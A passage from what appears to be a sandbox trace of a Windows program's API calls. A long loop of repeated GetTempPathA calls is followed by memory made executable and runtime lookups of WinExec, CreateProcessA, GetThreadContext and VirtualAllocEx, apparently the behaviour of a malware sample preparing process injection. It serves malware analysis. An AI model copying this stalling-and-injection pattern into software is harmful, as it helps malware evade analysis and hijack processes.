returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.575] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.576] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.577] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.578] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.579] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.695] VirtualProtect (in: lpAddress=0x683338, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0093.696] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0093.697] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0093.697] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.697] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0093.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.697] 
